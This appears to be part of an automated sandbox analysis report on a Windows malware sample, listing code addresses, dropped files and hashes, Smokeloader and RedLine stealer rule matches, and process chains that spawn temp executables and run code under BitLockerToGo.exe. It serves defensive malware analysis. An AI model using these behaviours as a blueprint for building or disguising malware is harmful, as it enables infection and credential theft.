Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB87D0	6_2_00007FF69DDB87D0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBABD0	6_2_00007FF69DDBABD0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC03A0	6_2_00007FF69DDC03A0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC71A0	6_2_00007FF69DDC71A0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE4B7B0	6_2_00007FF69DE4B7B0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBD7B0	6_2_00007FF69DDBD7B0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBE3B0	6_2_00007FF69DDBE3B0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE007B0	6_2_00007FF69DE007B0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBE780	6_2_00007FF69DDBE780
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC9580	6_2_00007FF69DDC9580
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB9190	6_2_00007FF69DDB9190
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBD190	6_2_00007FF69DDBD190
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC5D90	6_2_00007FF69DDC5D90
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDCA390	6_2_00007FF69DDCA390
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDEB760	6_2_00007FF69DDEB760
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE7A570	6_2_00007FF69DE7A570
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB9D5A	6_2_00007FF69DDB9D5A
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC0970	6_2_00007FF69DDC0970
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB4574	6_2_00007FF69DDB4574
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDFD770	6_2_00007FF69DDFD770
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE00570	6_2_00007FF69DE00570
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE15760	6_2_00007FF69DE15760
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE15940	6_2_00007FF69DE15940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5E372	9_2_00E5E372
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2C5E0	9_2_00E2C5E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5EDA2	9_2_00E5EDA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2B5B0	9_2_00E2B5B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E576A0	9_2_00E576A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2AE50	9_2_00E2AE50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E470E1	9_2_00E470E1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E580C0	9_2_00E580C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E450A6	9_2_00E450A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E3507B	9_2_00E3507B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E26026	9_2_00E26026
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2F02D	9_2_00E2F02D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2F83E	9_2_00E2F83E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E62000	9_2_00E62000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E49002	9_2_00E49002
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E3507B	9_2_00E3507B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E571E0	9_2_00E571E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E389F0	9_2_00E389F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E38990	9_2_00E38990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5F128	9_2_00E5F128
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E26AE0	9_2_00E26AE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E3A2F0	9_2_00E3A2F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E46AC9	9_2_00E46AC9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E44AD9	9_2_00E44AD9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2DAB1	9_2_00E2DAB1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E262B8	9_2_00E262B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2FA9F	9_2_00E2FA9F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5FA40	9_2_00E5FA40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E60220	9_2_00E60220
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5EBF0	9_2_00E5EBF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E40BD2	9_2_00E40BD2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E42B80	9_2_00E42B80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2FB8C	9_2_00E2FB8C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E4A364	9_2_00E4A364
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E61360	9_2_00E61360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E41B78	9_2_00E41B78
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E25320	9_2_00E25320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E48B20	9_2_00E48B20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5F330	9_2_00E5F330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E27334	9_2_00E27334
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E58B17	9_2_00E58B17
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E45B13	9_2_00E45B13
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E37CAB	9_2_00E37CAB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2A460	9_2_00E2A460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E3B467	9_2_00E3B467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E33C77	9_2_00E33C77
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E32C26	9_2_00E32C26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5DC3B	9_2_00E5DC3B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E61C00	9_2_00E61C00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E44DAA	9_2_00E44DAA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E265B3	9_2_00E265B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2F5B1	9_2_00E2F5B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2ED90	9_2_00E2ED90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E37599	9_2_00E37599
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E34578	9_2_00E34578
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E58540	9_2_00E58540
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E48550	9_2_00E48550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5F520	9_2_00E5F520
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2FD2F	9_2_00E2FD2F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E4A50F	9_2_00E4A50F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E28510	9_2_00E28510
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E46516	9_2_00E46516
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E49EC2	9_2_00E49EC2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2D6B0	9_2_00E2D6B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E3FE80	9_2_00E3FE80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E45E70	9_2_00E45E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E30E42	9_2_00E30E42
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E55641	9_2_00E55641
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E36E5A	9_2_00E36E5A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E38E26	9_2_00E38E26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E4460A	9_2_00E4460A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E4FE11	9_2_00E4FE11
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E617E0	9_2_00E617E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E357FD	9_2_00E357FD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E567A5	9_2_00E567A5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E29FB0	9_2_00E29FB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E2CF80	9_2_00E2CF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E26F80	9_2_00E26F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E56F90	9_2_00E56F90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5FF62	9_2_00E5FF62
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E5C770	9_2_00E5C770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E42740	9_2_00E42740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E21F50	9_2_00E21F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E51759	9_2_00E51759
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E43F18	9_2_00E43F18
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00426C2C	10_2_00426C2C
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00425ECB	10_2_00425ECB
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_0042528F	10_2_0042528F
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00424D4B	10_2_00424D4B
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_004257D3	10_2_004257D3
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00402D8C	10_2_00402D8C

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\46F6.exe 7C4B4F1A1F108F68B76B671C61733F392114BBFF28813279B67B63C5FE3939B9
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\E9D3.exe F1530D12529D8B0ED379457FEEE1A7CFC223596F455EA0D0771F414699BC88F5

Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: String function: 00007FF69DDB8A80 appears 35 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00E29910 appears 156 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 00E28FD0 appears 49 times

Source: 46F6.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: E9D3.exe.1.dr	Static PE information: Number of sections : 11 > 10

Source: oRKal761Qm.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.2175200910.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2175323602.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2923398094.000000C000F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/4@19/10

Source: C:\Users\user\Desktop\oRKal761Qm.exe

Code function: 0_2_005CDBB1 CreateToolhelp32Snapshot,Module32First,

0_2_005CDBB1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 9_2_00E4C060 CoCreateInstance,

9_2_00E4C060

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ssegbth

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Mutant created: \Sessions\1\BaseNamedObjects\fuckoff

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\E9D3.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\46F6.exe

File opened: C:\Windows\system32\7488b3ce05fa250ce50043aa905692345cbf4b8bdbecf3b83b0c3a2e04ef9787AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ssegbth

Command line argument: pq@

10_2_004070C0

Source: oRKal761Qm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\oRKal761Qm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: oRKal761Qm.exe

ReversingLabs: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\oRKal761Qm.exe "C:\Users\user\Desktop\oRKal761Qm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ssegbth C:\Users\user\AppData\Roaming\ssegbth
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E9D3.exe C:\Users\user\AppData\Local\Temp\E9D3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\46F6.exe C:\Users\user\AppData\Local\Temp\46F6.exe
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ssegbth C:\Users\user\AppData\Roaming\ssegbth
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E9D3.exe C:\Users\user\AppData\Local\Temp\E9D3.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\46F6.exe C:\Users\user\AppData\Local\Temp\46F6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
